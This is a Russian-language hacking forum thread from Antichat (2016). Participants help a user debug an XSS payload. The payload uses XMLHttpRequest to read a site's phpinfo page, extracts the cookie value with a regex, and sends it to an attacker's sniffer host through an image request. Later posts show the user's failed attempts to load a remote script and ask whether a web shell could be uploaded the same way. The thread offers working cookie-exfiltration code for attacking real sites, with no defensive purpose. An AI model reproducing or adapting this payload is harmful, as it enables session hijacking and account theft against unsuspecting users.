ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.04.2016, 17:02
|
|
Познающий
Регистрация: 19.03.2016
Сообщений: 42
Провел на форуме:
8469
Репутация:
1
|
|
Сообщение от t0ma5
↑
такое может происходить если куки не распарсились, посмотри вывод phpinfo, там точно есть массив HTTP_COOKIE ?
Есть массив
Сообщение от M_script
↑
Добавь в начале кода строку "window.onload = function() {", в конце "}". Также укажи протокол в ссылках "http://" или "https://" вместо "//", не все браузеры поддерживают.
Кроссдоменные запросы отправляться будут, получить ответ нельзя, но это и не нужно в данном случае.
Протоколы указывал по разному, не хочет работать. . Не понимаю в чем проблемма.
В XSS вставляю скрипт в таком виде img= new Image();img.src=" http://bldfdfdd.125mb.com/22.js" . Может проблемма в src ? В таком виде браузер подгружает скрипт с хостинга, но он не исполняется .
|
|
|
11.04.2016, 17:21
|
|
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от M_script
↑
Кроссдоменные запросы отправляться будут, получить ответ нельзя, но это и не нужно в данном случае.
В вики по-другому написано: " Cross-domain" AJAX requests are forbidden by default because of their ability to perform advanced requests (POST, PUT, DELETE and other types of HTTP requests, along with specifying custom HTTP headers) that introduce many cross-site scripting security issues. CORS defines a way in which a browser and server can interact to determine safely whether or not to allow the cross-origin request." И в общем-то логично, иначе какая это защита от хсс. Вот в этой статье, например: http://hayageek.com/cross-domain-ajax-request-jquery/ в серверных заголовках конкретно указываются, как методы/заголовки разрешены.
Сообщение от bazaWT
↑
Есть массив
Протоколы указывал по разному, не хочет работать. . Не понимаю в чем проблемма.
В XSS вставляю скрипт в таком виде img= new Image();img.src="
http://bldfdfdd.125mb.com/22.js
" . Может проблемма в src ? В таком виде браузер подгружает скрипт с хостинга, но он не исполняется .
Протестируй у себя через хттп-прокси какой-нибудь и посмотрим, отправляются ли данные на самом деле через xmlhttprequest или нет.
|
|
|
|
11.04.2016, 17:52
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Это шутка? Почему картинка должна исполняться как скрипт?
Сообщение от blackbox
↑
В вики по-другому написано:
Произвольные заголовки запрещены. Обычный POST/GET с дефолтными заголовками отправляется.
Код:
var x = new XMLHttpRequest();
x.open('POST', 'http://anysite/', true);
x.send('param=value');
|
|
|
|
11.04.2016, 18:36
|
|
Познающий
Регистрация: 19.03.2016
Сообщений: 42
Провел на форуме:
8469
Репутация:
1
|
|
Сообщение от M_script
↑
Это шутка? Почему картинка должна исполняться как скрипт?
code]
Я по разному пробовал , src=" http://bdkldjf.125mb.com/22.js" так тоже. Но в ответах фаербага и фидлера нету записей что бы передавались данные через xmlhttprequest.
|
|
|
|
11.04.2016, 20:00
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Пояснения по этому коду
Сообщение от yarbabin
↑
надеюсь
@psihoz26
меня не покорает за его скрипт)
Код:
var xhr = new XMLHttpRequest();
xhr.open('GET', '/$PARAM1', true);
xhr.send(null);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if(xhr.status == 200) {
(new Image()).src="$PARAM2"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
}
}
- локальная урла сайта, на котором xss и на котором ты можешь читать phpInfo: http://xss.com/some_path/php_info.php
$PARAM2 - сайт с твоим снифером, на который ты "как бы" обращаешься за картинкой и в параметрах запроса указываешь выдранные куки из ответа:
xhr.responseText - ответ с данными от phpInfo,
/_COOKIE.*? (.*?)/m - регулярка, которая выдёргивает куки из ответа.
В итоге именно этот скрипт с изменёнными под тебя $PARAM12 должен выполняться на стороне браузера. |
|
|
|
11.04.2016, 20:18
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от yarbabin
↑
надеюсь
@psihoz26
меня не покорает за его скрипт)
Копирайтов еще не хватает, здесь же столько кода
|
|
|
|
11.04.2016, 20:19
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от bazaWT
↑
Я по разному пробовал , src="
http://bdkldjf.125mb.com/22.js
" так тоже. Но в ответах фаербага и фидлера нету записей что бы передавались данные через xmlhttprequest.
на код просмотрите еще раз
|
|
|
|
12.04.2016, 03:29
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от bazaWT
↑
Я по разному пробовал , src="
http://bdkldjf.125mb.com/22.js
" так тоже. Но в ответах фаербага и фидлера нету записей что бы передавались данные через xmlhttprequest.
|
|
|
|
15.04.2016, 22:46
|
|
Познающий
Регистрация: 19.03.2016
Сообщений: 42
Провел на форуме:
8469
Репутация:
1
|
|
Мужики подскажите, застопорился с этим скриптом . Он изымает куки с phphinfo , но только одну строчку . Гдето в регулярке проблема .
Код:
new Image()).src="//%сниффер%/?"+xhr.responseText.match(/_COOKIE.*?(.*?)/m)[1]
}
Но не пойму где , пробовал без нее, чисто текст , так вобще не передается на снифер . |
|
|
|
17.04.2016, 03:13
|
|
Участник форума
Регистрация: 22.07.2011
Сообщений: 229
Провел на форуме:
55143
Репутация:
0
|
|
Из вышесказанного, получается даже можно шелл залить?(опред. cms), зная какой post запрос слать(загрузка файла в админке в дефолт директорию)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
